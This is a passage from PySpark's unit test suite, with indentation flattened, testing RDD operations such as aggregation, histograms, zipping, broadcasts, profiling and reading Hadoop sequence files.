map(lambda x: self.assertEqual(0, x[2]), other_partitions)
# The task attempt id should be different
self.assertTrue(result[0][3] != result[9][3])
def test_tc_on_driver(self):
"""Verify that getting the TaskContext on the driver returns None."""
tc = TaskContext.get()
self.assertTrue(tc is None)
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
from time import sleep
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it2))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
oldconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
newconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
